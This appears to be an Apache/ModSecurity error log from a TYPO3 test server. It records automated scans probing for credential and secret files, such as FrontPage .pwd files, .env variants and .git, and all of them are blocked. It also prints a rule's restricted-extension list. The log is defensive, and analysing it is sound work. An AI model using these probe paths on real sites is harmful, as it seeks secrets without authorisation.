[Sat Jan 25 13:59:59.212203 2025] [:error] [pid 697479] [client 109.202.99.46:19529] [client 109.202.99.46] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/_vti_pvt/administrators.pwd"] [unique_id "Z5TgT467QWTMsr0x5iwtNQAAAAQ"]
[Sat Jan 25 13:59:59.212557 2025] [:error] [pid 697479] [client 109.202.99.46:19529] [client 109.202.99.46] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/_vti_pvt/administrators.pwd"] [unique_id "Z5TgT467QWTMsr0x5iwtNQAAAAQ"]
[Sat Jan 25 13:59:59.359654 2025] [:error] [pid 697808] [client 109.202.99.46:40231] [client 109.202.99.46] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".pwd"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/_vti_pvt/service.pwd"] [unique_id "Z5TgT1kaCSW66irQ4OAmWAAAAAE"]
[Sat Jan 25 13:59:59.360052 2025] [:error] [pid 697808] [client 109.202.99.46:40231] [client 109.202.99.46] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/_vti_pvt/service.pwd"] [unique_id "Z5TgT1kaCSW66irQ4OAmWAAAAAE"]
[Sat Jan 25 13:59:59.360283 2025] [:error] [pid 697808] [client 109.202.99.46:40231] [client 109.202.99.46] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/_vti_pvt/service.pwd"] [unique_id "Z5TgT1kaCSW66irQ4OAmWAAAAAE"]
[Sat Jan 25 13:59:59.365566 2025] [:error] [pid 697756] [client 109.202.99.46:17495] [client 109.202.99.46] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "Z5TgT9avqBpWMKxbPGEO5gAAAAY"]
[Sat Jan 25 13:59:59.365783 2025] [:error] [pid 697756] [client 109.202.99.46:17495] [client 109.202.99.46] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "Z5TgT9avqBpWMKxbPGEO5gAAAAY"]
[Sat Jan 25 13:59:59.365998 2025] [:error] [pid 697756] [client 109.202.99.46:17495] [client 109.202.99.46] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "Z5TgT9avqBpWMKxbPGEO5gAAAAY"]
[Tue Jan 28 00:29:43.056974 2025] [authz_core:error] [pid 758874] [client 3.96.54.77:42862] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Jan 29 18:53:30.859893 2025] [authz_core:error] [pid 800906] [client 45.148.10.86:43780] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Thu Jan 30 22:27:56.296239 2025] [:error] [pid 828788] [client 158.220.108.107:40888] [client 158.220.108.107] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z5vu3PIOLt0EkS97OycXgAAAAAo"]
[Thu Jan 30 22:27:56.298134 2025] [:error] [pid 828788] [client 158.220.108.107:40888] [client 158.220.108.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z5vu3PIOLt0EkS97OycXgAAAAAo"]
[Thu Jan 30 22:27:56.298729 2025] [:error] [pid 828788] [client 158.220.108.107:40888] [client 158.220.108.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z5vu3PIOLt0EkS97OycXgAAAAAo"]
[Sat Feb 01 17:12:39.251013 2025] [:error] [pid 861059] [client 45.148.10.235:35006] [client 45.148.10.235] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z55H92plr-TSuPqzexWOvgAAAAY"]
[Sat Feb 01 17:12:39.253844 2025] [:error] [pid 861059] [client 45.148.10.235:35006] [client 45.148.10.235] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z55H92plr-TSuPqzexWOvgAAAAY"]
[Sat Feb 01 17:12:39.254470 2025] [:error] [pid 861059] [client 45.148.10.235:35006] [client 45.148.10.235] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z55H92plr-TSuPqzexWOvgAAAAY"]
[Sat Feb 01 17:12:39.520322 2025] [:error] [pid 861132] [client 45.148.10.235:35008] [client 45.148.10.235] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z55H91VzhXgp3RIU-yr9kAAAAAo"]
[Sat Feb 01 17:12:39.522097 2025] [:error] [pid 861132] [client 45.148.10.235:35008] [client 45.148.10.235] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z55H91VzhXgp3RIU-yr9kAAAAAo"]
[Sat Feb 01 17:12:39.522674 2025] [:error] [pid 861132] [client 45.148.10.235:35008] [client 45.148.10.235] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z55H91VzhXgp3RIU-yr9kAAAAAo"]
[Sat Feb 01 17:12:40.205361 2025] [:error] [pid 861131] [client 45.148.10.235:35046] [client 45.148.10.235] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "Z55H-GaweZVEg_fXA0Av1QAAAAk"]
[Sat Feb 01 17:12:40.205743 2025] [:error] [pid 861131] [client 45.148.10.235:35046] [client 45.148.10.235] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "Z55H-GaweZVEg_fXA0Av1QAAAAk"]
[Sat Feb 01 17:12:40.205973 2025] [:error] [pid 861131] [client 45.148.10.235:35046] [client 45.148.10.235] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "Z55H-GaweZVEg_fXA0Av1QAAAAk"]
[Sat Feb 01 17:12:40.386442 2025] [:error] [pid 859227] [client 45.148.10.235:35048] [client 45.148.10.235] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "Z55H-Ozy_B4GspBK98yc9AAAAAQ"]
[Sat Feb 01 17:12:40.387030 2025] [:error] [pid 859227] [client 45.148.10.235:35048] [client 45.148.10.235] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "Z55H-Ozy_B4GspBK98yc9AAAAAQ"]
[Sat Feb 01 17:12:40.387514 2025] [:error] [pid 859227] [client 45.148.10.235:35048] [client 45.148.10.235] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "Z55H-Ozy_B4GspBK98yc9AAAAAQ"]
[Sat Feb 01 17:12:40.575358 2025] [:error] [pid 861111] [client 45.148.10.235:35064] [client 45.148.10.235] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /login/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/login/.env"] [unique_id "Z55H-Lz4BYWrE8_amMk_WwAAAAc"]
[Sat Feb 01 17:12:40.575933 2025] [:error] [pid 861111] [client 45.148.10.235:35064] [client 45.148.10.235] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/login/.env"] [unique_id "Z55H-Lz4BYWrE8_amMk_WwAAAAc"]
[Sat Feb 01 17:12:40.576456 2025] [:error] [pid 861111] [client 45.148.10.235:35064] [client 45.148.10.235] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/login/.env"] [unique_id "Z55H-Lz4BYWrE8_amMk_WwAAAAc"]
[Sat Feb 01 17:12:40.738852 2025] [:error] [pid 860544] [client 45.148.10.235:35070] [client 45.148.10.235] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "Z55H-DZok1NoujFekOA0XgAAAAU"]
[Sat Feb 01 17:12:40.739458 2025] [:error] [pid 860544] [client 45.148.10.235:35070] [client 45.148.10.235] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "Z55H-DZok1NoujFekOA0XgAAAAU"]
[Sat Feb 01 17:12:40.739978 2025] [:error] [pid 860544] [client 45.148.10.235:35070] [client 45.148.10.235] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "Z55H-DZok1NoujFekOA0XgAAAAU"]
[Sat Feb 01 17:12:40.926456 2025] [:error] [pid 861135] [client 45.148.10.235:35074] [client 45.148.10.235] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "Z55H-PI_nW9L3Cy3JHsCVAAAAAw"]
[Sat Feb 01 17:12:40.926871 2025] [:error] [pid 861135] [client 45.148.10.235:35074] [client 45.148.10.235] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "Z55H-PI_nW9L3Cy3JHsCVAAAAAw"]
[Sat Feb 01 17:12:40.927161 2025] [:error] [pid 861135] [client 45.148.10.235:35074] [client 45.148.10.235] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "Z55H-PI_nW9L3Cy3JHsCVAAAAAw"]
[Sat Feb 01 17:12:41.092365 2025] [:error] [pid 861134] [client 45.148.10.235:35084] [client 45.148.10.235] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "Z55H-a5reRm-mvlO2n9_SQAAAAs"]
[Sat Feb 01 17:12:41.092992 2025] [:error] [pid 861134] [client 45.148.10.235:35084] [client 45.148.10.235] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "Z55H-a5reRm-mvlO2n9_SQAAAAs"]
[Sat Feb 01 17:12:41.093545 2025] [:error] [pid 861134] [client 45.148.10.235:35084] [client 45.148.10.235] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "Z55H-a5reRm-mvlO2n9_SQAAAAs"]
[Sat Feb 01 17:12:41.337193 2025] [:error] [pid 861059] [client 45.148.10.235:35088] [client 45.148.10.235] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "Z55H-Wplr-TSuPqzexWOvwAAAAY"]
[Sat Feb 01 17:12:41.337802 2025] [:error] [pid 861059] [client 45.148.10.235:35088] [client 45.148.10.235] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "Z55H-Wplr-TSuPqzexWOvwAAAAY"]
[Sat Feb 01 17:12:41.338194 2025] [:error] [pid 861059] [client 45.148.10.235:35088] [client 45.148.10.235] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "Z55H-Wplr-TSuPqzexWOvwAAAAY"]
[Sun Feb 02 01:51:03.113367 2025] [:error] [pid 879503] [client 18.170.2.62:49703] [client 18.170.2.62] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "Z57Bd48QlVt4jagukqXL2AAAAAI"]
[Sun Feb 02 01:51:03.113944 2025] [:error] [pid 879503] [client 18.170.2.62:49703] [client 18.170.2.62] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "Z57Bd48QlVt4jagukqXL2AAAAAI"]
